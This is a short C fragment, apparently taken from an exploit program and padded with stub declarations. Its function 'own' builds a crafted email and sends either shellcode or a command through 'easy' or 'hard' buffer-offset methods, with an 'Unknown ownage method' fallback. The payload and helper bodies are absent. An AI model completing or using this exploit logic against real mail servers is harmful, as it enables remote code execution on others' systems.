
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct target_info {int method; int dist; scalar_t__ buff; int sys; } ;


 scalar_t__ PLIST ;
 int die (int ,char*) ;
 int lame_cmd ;
 char* mail ;
 int own_easy (int ,int ) ;
 int own_hard (int ,scalar_t__,scalar_t__,int ,int ) ;
 int prepare_mail (char*,char*,char*) ;
 int printf (char*,char*) ;
 int shellcode ;

void own(struct target_info t,char *from,char *sub,char *to) {
 prepare_mail(from,sub,to);


 switch(t.method) {
  case 1:
   own_hard(t.sys,t.buff-PLIST,t.buff,t.dist,lame_cmd);
   break;

  case 0:
   own_easy(t.dist,shellcode);
   break;

  default:
   die(0,"Unknown ownage method");
 }

 printf("%s",mail);

}
